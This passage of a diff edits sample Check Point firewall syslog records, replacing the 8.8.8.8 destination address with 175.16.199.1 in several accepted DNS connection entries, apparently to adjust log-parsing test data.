+<134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df7f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504127"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49139"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:48:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df7f,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"85.236.55.6"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"37722"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504132"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44438"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504132"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44438"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:48:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80df84,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"140.211.169.206"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"55750"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:48:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df89,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61336"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T17:48:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80df89,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.27"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44320"; 
service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10125"; xlatesrc:"0.0.0.0"] 
@@ -3281,7 +3281,7 @@
 <134>1 2020-03-29T17:50:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38605"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:50:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35376"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10128"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:50:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56170"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55753"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55753"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"63384"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10129"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43051"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:50:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dfe7,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50700"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10130"; xlatesrc:"0.0.0.0"]
@@ -3292,71 +3292,71 @@ <134>1 2020-03-29T17:50:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dff5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T17:51:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e027,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] <134>1 2020-03-29T17:51:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e029,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43014"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52935"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52732"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53883"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38848"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43014"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52935"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04b,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504331"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:52:11Z 